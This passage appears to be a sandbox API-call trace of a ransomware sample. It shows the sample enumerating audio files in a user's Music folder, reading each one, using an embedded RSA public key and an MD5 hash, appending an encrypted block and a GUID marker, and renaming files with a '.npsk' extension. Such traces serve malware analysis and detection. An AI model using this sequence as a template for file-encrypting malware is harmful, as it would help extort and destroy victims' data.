returned="" [0218.457] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\xaU6e6HDu\\pAmb2w5Ag3o\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x72b4c460, ftCreationTime.dwHighDateTime=0x1d5e7f9, ftLastAccessTime.dwLowDateTime=0x8eb91a70, ftLastAccessTime.dwHighDateTime=0x1d5e58e, ftLastWriteTime.dwLowDateTime=0x8eb91a70, ftLastWriteTime.dwHighDateTime=0x1d5e58e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0218.462] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x72b4c460, ftCreationTime.dwHighDateTime=0x1d5e7f9, ftLastAccessTime.dwLowDateTime=0x8eb91a70, ftLastAccessTime.dwHighDateTime=0x1d5e58e, ftLastWriteTime.dwLowDateTime=0x8eb91a70, ftLastWriteTime.dwHighDateTime=0x1d5e58e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0218.462] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x316bdf50, ftCreationTime.dwHighDateTime=0x1d5db99, ftLastAccessTime.dwLowDateTime=0x1ec25150, ftLastAccessTime.dwHighDateTime=0x1d5dd6e, ftLastWriteTime.dwLowDateTime=0x1ec25150, ftLastWriteTime.dwHighDateTime=0x1d5dd6e, nFileSizeHigh=0x0, nFileSizeLow=0xb1ea, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EITLtcYHkiQ_fFMPh4.mp3", cAlternateFileName="EITLTC~1.MP3")) returned 1 [0218.462] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\xaU6e6HDu\\pAmb2w5Ag3o\\EITLtcYHkiQ_fFMPh4.mp3") returned=".mp3" [0218.462] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\xaU6e6HDu\\pAmb2w5Ag3o\\EITLtcYHkiQ_fFMPh4.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tcn4\\sg3cqdhod\\xau6e6hdu\\pamb2w5ag3o\\eitltcyhkiq_ffmph4.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0218.463] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=45546) returned 1 [0218.463] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0218.465] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xb1c4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0218.465] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0218.467] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0xb1ea, lpOverlapped=0x0) returned 1 [0218.468] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0218.468] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0218.468] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0218.468] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b21b0) returned 1 [0218.469] CryptCreateHash (in: hProv=0x7b21b0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0218.469] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0218.469] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0218.469] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0218.469] GetLastError () returned 0x0 [0218.469] CryptDestroyHash (hHash=0x3277d68) returned 1 [0218.469] CryptReleaseContext (hProv=0x7b21b0, dwFlags=0x0) returned 1 [0218.470] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0218.470] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0218.470] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0218.470] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a8ffa0, Size=0x218) returned 0x3a8afa0 [0218.471] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xb1ea, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0218.471] WriteFile (in: hFile=0x61c, lpBuffer=0x3aa1ce8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3aa1ce8*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0218.471] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0218.471] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0218.471] CloseHandle (hObject=0x61c) returned 1 [0218.475] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\xaU6e6HDu\\pAmb2w5Ag3o\\EITLtcYHkiQ_fFMPh4.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tcn4\\sg3cqdhod\\xau6e6hdu\\pamb2w5ag3o\\eitltcyhkiq_ffmph4.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\xaU6e6HDu\\pAmb2w5Ag3o\\EITLtcYHkiQ_fFMPh4.mp3.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tcn4\\sg3cqdhod\\xau6e6hdu\\pamb2w5ag3o\\eitltcyhkiq_ffmph4.mp3.npsk")) returned 1 [0218.477] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1c88f00, ftCreationTime.dwHighDateTime=0x1d5da6b, ftLastAccessTime.dwLowDateTime=0xb876c010, ftLastAccessTime.dwHighDateTime=0x1d5dd50, ftLastWriteTime.dwLowDateTime=0xb876c010, ftLastWriteTime.dwHighDateTime=0x1d5dd50, nFileSizeHigh=0x0, nFileSizeLow=0x10abb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LF6HB8B5cv.m4a", cAlternateFileName="LF6HB8~1.M4A")) returned 1 [0218.477] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\xaU6e6HDu\\pAmb2w5Ag3o\\LF6HB8B5cv.m4a") returned=".m4a" [0218.477] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\xaU6e6HDu\\pAmb2w5Ag3o\\LF6HB8B5cv.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tcn4\\sg3cqdhod\\xau6e6hdu\\pamb2w5ag3o\\lf6hb8b5cv.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0218.478] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=68283) returned 1 [0218.478] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0218.480] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x10a95, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0218.480] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0218.482] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x10abb, lpOverlapped=0x0) returned 1 [0218.483] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0218.483] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0218.483] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0218.483] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b21b0) returned 1 [0218.485] CryptCreateHash (in: hProv=0x7b21b0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0218.485] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0218.485] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0218.485] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0218.485] GetLastError () returned 0x0 [0218.485] CryptDestroyHash (hHash=0x3277d68) returned 1 [0218.485] CryptReleaseContext (hProv=0x7b21b0, dwFlags=0x0) returned 1 [0218.485] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0218.485] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0218.485] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0218.486] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a8ffa0, Size=0x218) returned 0x3a8afa0 [0218.486] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x10abb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0218.486] WriteFile (in: hFile=0x61c, lpBuffer=0x3aa1ce8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3aa1ce8*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0218.487] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0218.487] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0218.487] CloseHandle (hObject=0x61c) returned 1 [0218.490] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\xaU6e6HDu\\pAmb2w5Ag3o\\LF6HB8B5cv.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tcn4\\sg3cqdhod\\xau6e6hdu\\pamb2w5ag3o\\lf6hb8b5cv.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\xaU6e6HDu\\pAmb2w5Ag3o\\LF6HB8B5cv.m4a.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tcn4\\sg3cqdhod\\xau6e6hdu\\pamb2w5ag3o\\lf6hb8b5cv.m4a.npsk")) returned 1 [0218.492] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc154f3c0, ftCreationTime.dwHighDateTime=0x1d5d849, ftLastAccessTime.dwLowDateTime=0x3256fce0, ftLastAccessTime.dwHighDateTime=0x1d5db3c, ftLastWriteTime.dwLowDateTime=0x3256fce0, ftLastWriteTime.dwHighDateTime=0x1d5db3c, nFileSizeHigh=0x0, nFileSizeLow=0x185ef, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YzD5HiAov.wav", cAlternateFileName="YZD5HI~1.WAV")) returned 1 [0218.492] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\xaU6e6HDu\\pAmb2w5Ag3o\\YzD5HiAov.wav") returned=".wav" [0218.492] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\xaU6e6HDu\\pAmb2w5Ag3o\\YzD5HiAov.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tcn4\\sg3cqdhod\\xau6e6hdu\\pamb2w5ag3o\\yzd5hiaov.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0218.494] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=99823) returned 1 [0218.494] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0218.496] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x185c9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0218.496] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0218.498] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x185ef, lpOverlapped=0x0) returned 1 [0218.499] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0218.499] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0218.499] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0218.499] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b21b0) returned 1 [0218.500] CryptCreateHash (in: hProv=0x7b21b0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0218.500] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0218.500] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0218.500] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0218.500] GetLastError () returned 0x0 [0218.500] CryptDestroyHash (hHash=0x3277d68) returned 1 [0218.500] CryptReleaseContext (hProv=0x7b21b0, dwFlags=0x0) returned 1 [0218.500] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0218.500] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0218.501] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0218.501] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a8ffa0, Size=0x218) returned 0x3a8afa0 [0218.502] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x185ef, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0218.502] WriteFile (in: hFile=0x61c, lpBuffer=0x3aa1ce8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3aa1ce8*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0218.502] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0218.502] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0218.503] CloseHandle (hObject=0x61c) returned 1 [0218.505] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\xaU6e6HDu\\pAmb2w5Ag3o\\YzD5HiAov.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tcn4\\sg3cqdhod\\xau6e6hdu\\pamb2w5ag3o\\yzd5hiaov.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\xaU6e6HDu\\pAmb2w5Ag3o\\YzD5HiAov.wav.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tcn4\\sg3cqdhod\\xau6e6hdu\\pamb2w5ag3o\\yzd5hiaov.wav.npsk")) returned 1 [0218.507] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc154f3c0, ftCreationTime.dwHighDateTime=0x1d5d849, ftLastAccessTime.dwLowDateTime=0x3256fce0, ftLastAccessTime.dwHighDateTime=0x1d5db3c, ftLastWriteTime.dwLowDateTime=0x3256fce0, ftLastWriteTime.dwHighDateTime=0x1d5db3c, nFileSizeHigh=0x0, nFileSizeLow=0x185ef, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YzD5HiAov.wav", cAlternateFileName="YZD5HI~1.WAV")) returned 0 [0218.507] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0218.507] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0218.507] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0218.507] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\Search\\") returned="Search\\" [0218.507] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\") returned="10.0\\" [0218.507] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\") returned="Acrobat\\" [0218.507] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0218.507] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0218.507] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" 